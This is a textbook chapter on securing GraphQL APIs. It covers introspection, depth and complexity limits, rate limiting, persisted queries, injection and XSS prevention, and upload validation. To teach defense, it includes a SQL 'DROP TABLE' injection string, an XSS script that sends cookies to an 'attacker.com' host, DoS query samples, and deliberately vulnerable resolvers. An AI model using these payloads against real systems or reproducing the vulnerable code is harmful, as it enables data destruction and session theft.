

## **Chapter 12: Security Hardening**

---

## **Learning Objectives**

By the end of this chapter, you will be able to:

- Secure your GraphQL schema by disabling introspection in production environments
- Implement query depth limiting to prevent nested query attacks
- Configure query complexity analysis to prevent Denial of Service (DoS)
- Set up rate limiting for GraphQL operations
- Implement Persisted Queries (Trusted Documents) to prevent arbitrary query execution
- Protect against SQL Injection and XSS in resolvers
- Understand the security implications of file uploads in GraphQL
- Audit and secure your GraphQL API against common attack vectors

---

## **Prerequisites**

- Completed Chapter 7: Building a GraphQL Server
- Completed Chapter 9: Authentication and Authorization
- Understanding of common web security vulnerabilities (OWASP Top 10)
- Familiarity with HTTP middleware concepts

---

## **12.1 Understanding the Attack Surface**

GraphQL APIs have a unique attack surface compared to REST APIs. While REST endpoints are fixed and predictable, GraphQL allows clients to construct arbitrary queries. This flexibility creates specific vulnerabilities:

1. **Introspection Discovery**: Attackers can discover your entire schema structure
2. **Deep Recursion**: Nested queries can cause stack overflows or database timeouts
3. **Resource Exhaustion**: Expensive queries can crash your server (DoS)
4. **Injection Attacks**: Malicious input in variables can leak data

We will address each of these systematically.

---

## **12.2 Introspection: Disabling in Production**

GraphQL Introspection is the ability to query the schema itself (using `__schema`, `__type`, etc.). Tools like GraphiQL and Apollo Studio rely on this for auto-completion and documentation.

**The Risk:** In production, introspection allows attackers to discover your entire API structure, field names, relationships, and deprecated fields. This is reconnaissance gold for attackers.

### **Implementation**

**Apollo Server Configuration:**

```javascript
const { ApolloServer } = require('apollo-server');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  
  // Disable introspection in production
  introspection: process.env.NODE_ENV !== 'production',
  
  // Also disable the playground in production
  playground: process.env.NODE_ENV !== 'production',
});
```

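**Alternative: Using Validation Rules**

If you prefer to enforce this at the validation layer, graphql-js (v15.2 and later) ships a `NoSchemaIntrospectionCustomRule`. Validation rules receive graphql-js's `ValidationContext`, not the per-request context, so they cannot inspect `context.user`. Per-user gating (e.g., allowing introspection only for authenticated admins) has to happen elsewhere, such as in a server plugin or on a separate internal endpoint.

```javascript
const { ApolloServer } = require('apollo-server');
const { NoSchemaIntrospectionCustomRule } = require('graphql');

const isProduction = process.env.NODE_ENV === 'production';

const server = new ApolloServer({
  typeDefs,
  resolvers,
  // Reject any operation that selects __schema or __type in production
  validationRules: isProduction ? [NoSchemaIntrospectionCustomRule] : [],
});
```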

**Best Practice:** Always disable introspection in production unless you have a specific use case (like a public API with open documentation). If you must keep it enabled, restrict it to authenticated users with admin privileges.

---

## **12.3 Query Depth Limiting**

Attackers can craft deeply nested queries that cause stack overflows or timeouts. For example:

```graphql
query DeepAttack {
  users {
    friends {
      friends {
        friends {
          friends {
            friends {
              name
            }
          }
        }
      }
    }
  }
}
```

If each user has 10 friends, the innermost level alone attempts to fetch $10^5 = 100{,}000$ objects for every top-level user.
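As a rough check of that growth, the sketch below counts the objects resolved at each nesting level for a single top-level user. The helper name `objectsPerLevel` and the assumption that every user has exactly 10 friends are illustrative only.

```javascript
// Objects resolved at each nesting level for ONE top-level user,
// assuming every user has exactly `branching` friends (illustrative assumption).
function objectsPerLevel(branching, levels) {
  const counts = [];
  let current = 1;
  for (let level = 1; level <= levels; level += 1) {
    current *= branching;
    counts.push(current);
  }
  return counts;
}

const counts = objectsPerLevel(10, 5);
const total = counts.reduce((sum, n) => sum + n, 0);

console.log(counts[4]); // 100000 objects at the fifth `friends` level
console.log(total);     // 111110 objects across all five levels
```

The total is dominated by the deepest level, which is why capping depth is an effective first defense.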

### **Implementation**

Using `graphql-depth-limit`:

```javascript
const depthLimit = require('graphql-depth-limit');
const { ApolloServer } = require('apollo-server');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [
    // Limit query depth to 10 levels
    depthLimit(
      10,
      { ignore: [/_trusted$/] }, // Optional: ignore fields ending with _trusted
      // Optional callback: receives a map of operation name -> depth
      (depths) => {
        console.log('Query depths:', depths);
      }
    )
  ]
});
```

**Configuration Options:**

*   **Max Depth**: Set based on your legitimate use cases. If your deepest legitimate query is 5 levels deep, set the limit to 7-8 to allow some flexibility.
*   **Ignored Fields**: Some fields (like `__typename` or pagination cursors) don't actually recurse. You can exclude them from depth calculations.
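To make "depth" concrete, here is a minimal, dependency-free sketch that measures nesting on a simplified model of a selection set (a plain object whose leaf fields are `null`). This is not how `graphql-depth-limit` is implemented, and libraries differ on whether the outermost level counts as 0 or 1, so treat the absolute numbers as illustrative. `selectionDepth` and `MAX_DEPTH` are hypothetical names.

```javascript
// A selection set modeled as a plain object: keys are field names,
// values are nested selection objects, or null for leaf fields.
// This is a simplified stand-in for a parsed GraphQL document.
function selectionDepth(selection) {
  if (selection === null) return 0;
  let deepest = 0;
  for (const child of Object.values(selection)) {
    deepest = Math.max(deepest, selectionDepth(child));
  }
  // Count this selection set as one level, plus the deepest child below it.
  return 1 + deepest;
}

// Shape of the DeepAttack query: users -> friends (x5) -> name
const deepAttack = {
  users: { friends: { friends: { friends: { friends: { friends: { name: null } } } } } },
};

const MAX_DEPTH = 5; // hypothetical limit for this sketch
const depth = selectionDepth(deepAttack);

console.log(depth);              // 7
console.log(depth <= MAX_DEPTH); // false, so this query would be rejected
```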

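**Client Error Example** (the quoted name is the operation name, `TooDeep` is a placeholder, and the exact `extensions.code` depends on your server):

```json
{
  "errors": [
    {
      "message": "'TooDeep' exceeds maximum operation depth of 10",
      "extensions": { "code": "GRAPHQL_VALIDATION_FAILED" }
    }
  ]
}
```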

---

## **12.4 Query Complexity Limiting (DoS Prevention)**

Depth alone isn't enough. A query can be wide (many fields at the same level) rather than deep:

```graphql
query WideAttack {
  users(first: 10000) {
    name
    email
    phone
    address
    friends(first: 10000) {
      name
      email
      phone
      address
    }
  }
}
```

This query is only 3 levels deep but requests 100 million potential records.

### **Implementation**

Using `graphql-query-complexity`:

```javascript
const { ApolloServer } = require('apollo-server');
const { GraphQLError } = require('graphql');
const {
  createComplexityRule,
  simpleEstimator,
  fieldExtensionsEstimator,
} = require('graphql-query-complexity');

const MAX_COMPLEXITY = 1000; // Adjust based on your capacity

const server = new ApolloServer({
  typeDefs,
  resolvers,
  validationRules: [
    createComplexityRule({
      maximumComplexity: MAX_COMPLEXITY,

      // Estimators calculate complexity
      estimators: [
        // Use complexity defined in field extensions first
        fieldExtensionsEstimator(),

        // Fallback: each field costs 1 point
        simpleEstimator({ defaultComplexity: 1 })
      ],

      // Callback when complexity is calculated
      onComplete: (complexity) => {
        console.log(`Query complexity: ${complexity}`);
      },

      // Build the error returned when the limit is exceeded
      createError: (max, actual) =>
        new GraphQLError(
          `Query too complex: ${actual}. Maximum allowed complexity: ${max}`
        )
    })
  ]
});
```

### **Defining Field Complexity**

You must tell the estimator which fields are expensive:

```javascript
const resolvers = {
  Query: {
    users: {
      resolve: () => db.getUsers(),
      extensions: {
        complexity: ({ args, childComplexity }) => {
          // Base cost 10 + (limit * child complexity)
          const limit = args.first || 10;
          return 10 + limit * childComplexity;
        }
      }
    }
  },
  
  User: {
    friends: {
      resolve: (user) => db.getFriends(user.id),
      extensions: {
        complexity: ({ args, childComplexity }) => {
          // Friends are expensive to fetch
          const limit = args.first || 10;
          return 5 + limit * childComplexity;
        }
      }
    },
    
    // Simple fields cost 1 (handled by default)
    name: { resolve: (user) => user.name }
  }
};
```

**Calculating Complexity:**
*   `users(first: 10)` with child complexity 5 = $10 + (10 \times 5) = 60$
*   If `User.friends` has a base cost of 5 and `User.name` has complexity 1, a query fetching 10 users with 10 friends each (selecting only `name` on each friend) costs: $10 + 10 \times (5 + 10 \times 1) = 160$
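The arithmetic above can be reproduced with a small standalone sketch. It models each list field as `{ base, limit, children }` and each scalar field as a plain number, and applies the same `base + limit * childComplexity` formula used in the field extensions. The `cost` helper and the node shape are assumptions made for illustration, not part of `graphql-query-complexity`.

```javascript
// A list field is { base, limit, children }; a scalar field is its numeric cost.
function cost(node) {
  if (typeof node === 'number') return node;
  const childComplexity = node.children.reduce((sum, child) => sum + cost(child), 0);
  return node.base + node.limit * childComplexity;
}

// 10 users, each with 10 friends, selecting only `name` on each friend
const friends = { base: 5, limit: 10, children: [1] };
const users = { base: 10, limit: 10, children: [friends] };
console.log(cost(users)); // 160

// The WideAttack query: 4 scalar fields per user plus friends(first: 10000) with 4 scalars
const wideFriends = { base: 5, limit: 10000, children: [1, 1, 1, 1] };
const wideUsers = { base: 10, limit: 10000, children: [1, 1, 1, 1, wideFriends] };
console.log(cost(wideUsers)); // 400090010, far above a limit of 1000
```

Multiplying by the requested page size is what lets the limit catch wide queries that a depth limit alone would accept.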

---

## **12.5 Rate Limiting GraphQL Operations**

Even with complexity limits, you need to limit how often a client can make requests to prevent brute force attacks or API abuse.

### **Implementation**

Using `graphql-rate-limit`:

```javascript
const { createRateLimitRule } = require('graphql-rate-limit');
const { shield } = require('graphql-shield');

// Create a rule factory that identifies clients by user ID, falling back to IP.
// Each field below sets its own window and max.
const rateLimit = createRateLimitRule({
  identifyContext: (ctx) => ctx.user?.id || ctx.req.ip,
  formatError: () => 'Too many requests. Please try again later.',
});

// Apply to schema using GraphQL Shield
const permissions = shield({
  Query: {
    // Limit expensive queries strictly
    users: rateLimit({ window: '1m', max: 10 }),
    search: rateLimit({ window: '1m', max: 5 }),
    
    // Allow more frequent access to cheap queries
    me: rateLimit({ window: '1m', max: 60 }),
  },
  Mutation: {
    login: rateLimit({ window: '15m', max: 5 }), // Prevent brute force
    createUser: rateLimit({ window: '1h', max: 10 }),
  }
});
```

**Key Configuration:**

*   **Identity Function**: Distinguish between users (by user ID) and anonymous clients (by IP address).
*   **Window**: Time window for counting requests (e.g., '1m', '1h').
*   **Max**: Maximum requests allowed in that window.
*   **Storage**: Use Redis in production for distributed rate limiting across multiple server instances.
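To show how the identity key, window, and max interact, here is a minimal in-memory fixed-window limiter. It is a sketch only: `createFixedWindowLimiter` is a hypothetical helper, the window is given in milliseconds rather than as a string like `'1m'`, and the `Map` lives in one process, which is exactly why a shared store is needed once you run several instances.

```javascript
// Fixed-window limiter: at most `max` calls per `windowMs` for each key.
// `now` is injectable so the behavior can be exercised without real waiting.
function createFixedWindowLimiter({ windowMs, max, now = Date.now }) {
  const buckets = new Map(); // key -> { windowStart, count }; never evicted in this sketch

  return function consume(key) {
    const t = now();
    const bucket = buckets.get(key);

    // First request for this key, or the previous window has expired
    if (!bucket || t - bucket.windowStart >= windowMs) {
      buckets.set(key, { windowStart: t, count: 1 });
      return true;
    }
    if (bucket.count >= max) return false; // over the limit for this window
    bucket.count += 1;
    return true;
  };
}

// Usage with a fake clock: 2 requests per minute per client
let fakeTime = 0;
const allow = createFixedWindowLimiter({ windowMs: 60000, max: 2, now: () => fakeTime });

const firstWindow = [allow('user:1'), allow('user:1'), allow('user:1')];
const otherClient = allow('ip:203.0.113.7'); // separate key, separate budget
fakeTime = 60000;
const afterReset = allow('user:1');

console.log(firstWindow); // third call in the window is rejected
console.log(otherClient, afterReset);
```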

**Redis-backed Rate Limiting:**

```javascript
const { RateLimiterRedis } = require('rate-limiter-flexible');
const Redis = require('ioredis');

const redisClient = new Redis({ host: 'redis' });

const rateLimiter = new RateLimiterRedis({
  storeClient: redisClient,
  keyPrefix: 'graphql_limit',
  points: 10, // 10 requests
  duration: 60, // per 60 seconds
});

// Middleware to check rate limit
const rateLimitMiddleware = async (req, res, next) => {
  const key = req.user?.id || req.ip;
  
  try {
    await rateLimiter.consume(key);
    next();
  } catch (rejRes) {
    res.status(429).send('Too Many Requests');
  }
};
```

---

## **12.6 Persisted Queries and Trusted Documents**

**Persisted Queries** (also called **Trusted Documents** or **Allow Lists**) solve a critical security issue: arbitrary query execution.

By default, GraphQL servers accept any valid query string. Persisted Queries flip this model: the server only accepts specific, pre-registered queries.

### **12.6.1 What are Persisted Queries?**

1.  **Development**: Client extracts all GraphQL queries from the codebase.
2.  **Build**: Client generates unique hashes (SHA-256) for each query.
3.  **Registration**: Client sends the full query strings to the server, which stores them in a database (query ID → query string).
4.  **Production**: Client only sends the hash (ID), not the full query string.
5.  **Execution**: Server looks up the query by hash, rejects unknown hashes.

**Benefits:**
*   **Security**: Attackers cannot execute arbitrary queries, only pre-approved ones.
*   **Performance**: Reduced payload size (sending hash instead of full query).
*   **Caching**: CDN can cache responses keyed by hash.
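The build, registration, and lookup steps above can be sketched with Node's built-in `crypto` module. The function names (`sha256Hex`, `buildManifest`, `resolveTrustedDocument`) and the in-memory `Map` are assumptions for illustration; a real setup would generate the manifest in the client build and store it wherever the server can read it.

```javascript
const crypto = require('crypto');

// Hash a query string the same way on client and server.
function sha256Hex(text) {
  return crypto.createHash('sha256').update(text, 'utf8').digest('hex');
}

// Build/registration step: map each known query string to its hash.
function buildManifest(queries) {
  const manifest = new Map();
  for (const query of queries) {
    manifest.set(sha256Hex(query), query);
  }
  return manifest;
}

// Production step: resolve a hash to its query, rejecting unknown hashes.
function resolveTrustedDocument(manifest, hash) {
  const query = manifest.get(hash);
  if (query === undefined) {
    throw new Error('Unknown persisted query hash');
  }
  return query;
}

const meQuery = 'query Me { me { name } }';
const manifest = buildManifest([meQuery]);
const knownHash = sha256Hex(meQuery);

console.log(resolveTrustedDocument(manifest, knownHash)); // the registered query string
```

A hash that was never registered, such as the hash of an attacker's hand-written query, throws instead of executing.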

### **12.6.2 Implementation with Apollo**

**Automatic Persisted Queries (APQ):**

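Apollo supports a hybrid approach called APQ. If the server doesn't recognize the hash, the client resends the request with the full query, and the server stores it for future requests. Because any client can register any query this way, APQ by itself saves bandwidth but does not restrict which queries run.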
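The handshake can be simulated in a few lines. This is a simplified model, not Apollo's implementation: `createApqHandler` is a hypothetical helper, the store is an in-memory `Map`, and the error strings are illustrative. The request shape (`extensions.persistedQuery.sha256Hash`) follows the APQ protocol.

```javascript
const crypto = require('crypto');

function createApqHandler(store = new Map()) {
  return function handle({ query, extensions }) {
    const persisted = extensions && extensions.persistedQuery;
    const hash = persisted && persisted.sha256Hash;

    // Plain request without a hash: accepted as-is in this model
    if (!hash) return { query };

    // Hash only: succeed if the server has seen it, otherwise ask for the full query
    if (query === undefined) {
      const known = store.get(hash);
      return known ? { query: known } : { error: 'PersistedQueryNotFound' };
    }

    // Hash plus query: verify they match, then remember the pair
    const actual = crypto.createHash('sha256').update(query, 'utf8').digest('hex');
    if (actual !== hash) return { error: 'Hash does not match query' };
    store.set(hash, query);
    return { query };
  };
}

const handle = createApqHandler();
const query = 'query Me { me { name } }';
const sha256Hash = crypto.createHash('sha256').update(query, 'utf8').digest('hex');
const extensions = { persistedQuery: { version: 1, sha256Hash } };

const firstTry = handle({ extensions });         // server has never seen the hash
const retry = handle({ query, extensions });     // client resends with the full query
const later = handle({ extensions });            // hash alone now succeeds

console.log(firstTry.error, retry.query === query, later.query === query);
```

Note that the first branch accepts any plain query, which is why this flow needs an allow list on top before it provides any protection.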

**Server Setup:**

```javascript
const { ApolloServer } = require('apollo-server');
const { RedisCache } = require('apollo-server-cache-redis');

const server = new ApolloServer({
  typeDefs,
  resolvers,
  
  // Enable APQ with Redis cache
  persistedQueries: {
    cache: new RedisCache({
      host: 'redis-server',
    }),
    // Optional: expire stored queries after 24 hours (value in seconds)
    ttl: 86400,
  },
});
```

**Strict Mode (Production Only):**

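For maximum security, disable the "store if not found" behavior. This only stops new hashes from being registered: a request that carries a full `query` string (with or without a hash) is still executed, so a true allow list must also reject any request whose hash is not registered.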

```javascript
const { ApolloServer } = require('apollo-server');

const ALLOWED_QUERY_IDS = new Set([
  'a1b2c3...', // Hash of query 1
  'd4e5f6...', // Hash of query 2
  // ... pre-computed hashes from your client build
]);

const server = new ApolloServer({
  typeDefs,
  resolvers,
  persistedQueries: {
    // Only allow specific queries
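    cache: {
      async get(key) {
        // Apollo Server may namespace APQ cache keys (for example with an
        // "apq:" prefix), so strip it before checking the allow list
        const hash = key.replace(/^apq:/, '');
        if (ALLOWED_QUERY_IDS.has(hash)) {
          // Return the full query string from your database
          return db.getQueryByHash(hash);
        }
        return undefined;
      },
      async set(key, value) {
        // Do nothing - don't store new queries in production
        return;
      }
    }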
  }
});
```

**Client Setup (Apollo Client):**

```javascript
import { ApolloClient, InMemoryCache, HttpLink } from '@apollo/client';
import { createPersistedQueryLink } from '@apollo/client/link/persisted-queries';

const link = createPersistedQueryLink({
  sha256: async (query) => {
    // Use crypto to hash the query
    const encoder = new TextEncoder();
    const data = encoder.encode(query);
    const hashBuffer = await crypto.subtle.digest('SHA-256', data);
    const hashArray = Array.from(new Uint8Array(hashBuffer));
    return hashArray.map(b => b.toString(16).padStart(2, '0')).join('');
  }
}).concat(new HttpLink({ uri: '/graphql' }));

const client = new ApolloClient({
  cache: new InMemoryCache(),
  link,
});
```

---

## **12.7 SQL Injection and XSS Prevention in Resolvers**

GraphQL itself doesn't prevent injection attacks; you must sanitize inputs in your resolvers just like in REST APIs.

### **SQL Injection Prevention**

**Vulnerable Code:**

```javascript
const resolvers = {
  Query: {
    searchUsers: (_, { name }) => {
      // DANGEROUS: String interpolation in SQL
      return db.query(`SELECT * FROM users WHERE name LIKE '%${name}%'`);
    }
  }
};
```

**Attack Query:**

```graphql
query {
  searchUsers(name: "'; DROP TABLE users; --") {
    name
  }
}
```

**Secure Code:**

```javascript
const resolvers = {
  Query: {
    searchUsers: (_, { name }) => {
      // SAFE: Use parameterized queries
      return db.query('SELECT * FROM users WHERE name LIKE ?', [`%${name}%`]);
    }
  }
};
```

**Best Practices:**
*   Always use parameterized queries (prepared statements).
*   Use ORMs (Prisma, Sequelize) that parameterize queries for you, and keep user input out of their raw-query escape hatches.
*   Validate input using libraries like `validator` or `joi` before database operations.
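To see why interpolation is dangerous, compare the SQL text each approach produces for the attack payload. The sketch below only builds strings and never touches a database; `buildUnsafeSearch` and `buildSafeSearch` are hypothetical helpers, and the `?` placeholder syntax is an assumption that varies by driver (some use `$1`).

```javascript
// Interpolation: user input becomes part of the SQL text itself.
function buildUnsafeSearch(name) {
  return `SELECT * FROM users WHERE name LIKE '%${name}%'`;
}

// Parameterization: the SQL text is constant and input travels separately as data.
function buildSafeSearch(name) {
  return {
    text: 'SELECT * FROM users WHERE name LIKE ?',
    values: [`%${name}%`],
  };
}

const payload = "'; DROP TABLE users; --";

console.log(buildUnsafeSearch(payload));
// SELECT * FROM users WHERE name LIKE '%'; DROP TABLE users; --%'

const safe = buildSafeSearch(payload);
console.log(safe.text);   // SELECT * FROM users WHERE name LIKE ?
console.log(safe.values); // the payload, passed as an ordinary string value
```

In the unsafe version the payload closes the string literal and appends a second statement; in the safe version the statement the database parses never changes.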

### **XSS (Cross-Site Scripting) Prevention**

If your GraphQL API stores user-generated content that is later rendered in HTML (e.g., comments, posts), you must sanitize it on input or escape it on output.

**Vulnerable Resolver:**

```javascript
const resolvers = {
  Mutation: {
    createComment: (_, { text }) => {
      // Storing raw HTML/JS
      return db.comments.create({ text });
    }
  }
};
```

**Attack Input:**

```html
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>
```

**Secure Implementation:**

```javascript
const DOMPurify = require('isomorphic-dompurify');

const resolvers = {
  Mutation: {
    createComment: (_, { text }) => {
      // Sanitize HTML input
      const cleanText = DOMPurify.sanitize(text, { 
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
        ALLOWED_ATTR: ['href']
      });
      
      return db.comments.create({ text: cleanText });
    }
  }
};
```

**Alternatively:** Store raw text and escape on output in the client (React automatically escapes JSX, but raw HTML insertion is dangerous).
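For renderers that do not escape automatically (for example, server-side string templates), escaping on output can be as small as the sketch below. `escapeHtml` is a hypothetical helper covering the five characters that matter in HTML text and quoted attribute values; it is not a substitute for a sanitizer when you intend to allow some markup.

```javascript
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace characters that would otherwise be interpreted as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const comment = '<script>alert("x")</script>';
console.log(escapeHtml(comment));
// &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```

The stored text stays untouched, and the browser displays the tag as literal characters instead of running it.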

---

## **12.8 File Upload Security**

GraphQL has no built-in file upload mechanism; uploads are usually added through the GraphQL multipart request convention over `multipart/form-data` (implemented by `graphql-upload`). This opens security risks:

**Risks:**
*   **Malware Upload**: Executables disguised as images.
*   **Size Attacks**: Multi-gigabyte uploads exhausting disk space.
*   **Path Traversal**: Filenames like `../../../etc/passwd`.
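The path traversal risk is easy to demonstrate with Node's `path` module. The sketch below resolves a client-supplied filename against an upload directory and rejects anything that lands outside it. `resolveInside` and `/srv/uploads` are hypothetical, `baseDir` is assumed to be an absolute, already-normalized POSIX path, and `path.posix` is used so the result is the same on every platform.

```javascript
const path = require('path');

// Resolve `filename` under `baseDir`, refusing results outside that directory.
function resolveInside(baseDir, filename) {
  const target = path.posix.resolve(baseDir, filename);
  const prefix = baseDir.endsWith('/') ? baseDir : `${baseDir}/`;
  if (!target.startsWith(prefix)) {
    throw new Error('Path escapes upload directory');
  }
  return target;
}

console.log(resolveInside('/srv/uploads', 'avatar.png')); // /srv/uploads/avatar.png

try {
  resolveInside('/srv/uploads', '../../../etc/passwd');
} catch (err) {
  console.log(err.message); // Path escapes upload directory
}
```

Generating the stored filename yourself, rather than trusting the client's, avoids the problem entirely.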

**Secure Implementation:**

```javascript
const fs = require('fs');
const path = require('path');
const { pipeline } = require('stream/promises'); // Node 15+
const express = require('express');
const { v4: uuidv4 } = require('uuid');
const { ApolloServer } = require('apollo-server-express');
const { graphqlUploadExpress } = require('graphql-upload');

const app = express();

// Express middleware for uploads (register before Apollo's middleware)
app.use(
  '/graphql',
  graphqlUploadExpress({
    maxFileSize: 10000000, // 10 MB
    maxFiles: 10,
  })
);

// Resolver validation
const resolvers = {
  Mutation: {
    uploadAvatar: async (_, { file }, context) => {
      const { createReadStream, filename, mimetype } = await file;
      
      // 1. Validate MIME type (client-supplied, so treat it as a first filter only)
      const allowedTypes = ['image/jpeg', 'image/png', 'image/webp'];
      if (!allowedTypes.includes(mimetype)) {
        throw new Error('Invalid file type. Only images allowed.');
      }
      
      // 2. Validate extension
      const ext = path.extname(filename).toLowerCase();
      if (!['.jpg', '.jpeg', '.png', '.webp'].includes(ext)) {
        throw new Error('Invalid file extension.');
      }
      
      // 3. Sanitize filename (prevent path traversal)
      const sanitizedName = `${uuidv4()}${ext}`;
      const filepath = path.join(__dirname, 'uploads', sanitizedName);
      
      // 4. Stream to storage (don't buffer entire file in memory)
      const stream = createReadStream();
      await pipeline(stream, fs.createWriteStream(filepath));
      
      // 5. Optional: Scan with antivirus (ClamAV)
      // await scanFile(filepath);
      
      return { url: `/uploads/${sanitizedName}` };
    }
  }
};

// Define the server after the resolvers it references
const server = new ApolloServer({
  typeDefs,
  resolvers,
  uploads: false, // Disable default, use middleware instead
});

server.applyMiddleware({ app });
```
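Because the MIME type and extension both come from the client, a common extra check is to inspect the first bytes of the file for a known signature. The sketch below recognizes the three image formats allowed above; `sniffImageType` is a hypothetical helper, and it only proves the file starts like an image, not that the rest of it is harmless.

```javascript
// Return the detected image MIME type based on leading "magic bytes", or null.
function sniffImageType(buffer) {
  // JPEG files start with FF D8 FF
  if (buffer.length >= 3 && buffer[0] === 0xff && buffer[1] === 0xd8 && buffer[2] === 0xff) {
    return 'image/jpeg';
  }

  // PNG files start with an 8-byte signature
  const pngSignature = [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];
  if (buffer.length >= 8 && pngSignature.every((byte, i) => buffer[i] === byte)) {
    return 'image/png';
  }

  // WebP files are RIFF containers: "RIFF", 4 size bytes, then "WEBP"
  if (
    buffer.length >= 12 &&
    buffer.toString('ascii', 0, 4) === 'RIFF' &&
    buffer.toString('ascii', 8, 12) === 'WEBP'
  ) {
    return 'image/webp';
  }

  return null;
}

const pngHeader = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
const exeHeader = Buffer.from([0x4d, 0x5a, 0x90, 0x00]); // Windows executable ("MZ")

console.log(sniffImageType(pngHeader)); // image/png
console.log(sniffImageType(exeHeader)); // null
```

In a resolver, this would run on the first chunk of the upload stream, comparing the result with the declared `mimetype` before the file is kept.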

---

## **Chapter Summary**

Security is not a feature; it is a continuous process. This chapter covered the essential defenses for production GraphQL APIs.

### **Key Takeaways:**

1.  **Introspection**: Disable in production to prevent schema discovery, or restrict to authenticated admins.
2.  **Depth Limiting**: Prevent deep recursion attacks using `graphql-depth-limit`.
3.  **Complexity Analysis**: Calculate and limit query cost to prevent resource exhaustion (DoS).
4.  **Rate Limiting**: Restrict request frequency by user/IP to prevent brute force and abuse.
5.  **Persisted Queries**: Use Trusted Documents (Allow Lists) in production to prevent arbitrary query execution. Only pre-approved queries are executable.
6.  **Injection Prevention**: Always use parameterized queries for SQL and sanitize HTML to prevent XSS.
7.  **File Uploads**: Validate MIME types, extensions, sanitize filenames, limit size, and scan for malware.

### **Security Checklist for Production:**

- [ ] Introspection disabled or restricted
- [ ] Query depth limited (e.g., max 10)
- [ ] Query complexity limited (e.g., max 1000)
- [ ] Rate limiting implemented (Redis-backed)
- [ ] Persisted Queries enabled (strict mode)
- [ ] SQL injection prevented (parameterized queries)
- [ ] XSS prevented (HTML sanitized on input or escaped on output)
- [ ] File uploads validated and sanitized
- [ ] HTTPS enforced
- [ ] Error messages don't leak sensitive info

---

### **🚀 Next Up: Chapter 13 - Monitoring and Observability**

**Summary:** A secure and performant system is only useful if you can see what's happening inside it. In Chapter 13, we will explore monitoring and observability. You will learn how to implement structured logging, trace resolver execution times, integrate with Apollo Studio for schema monitoring, and set up alerts for when things go wrong.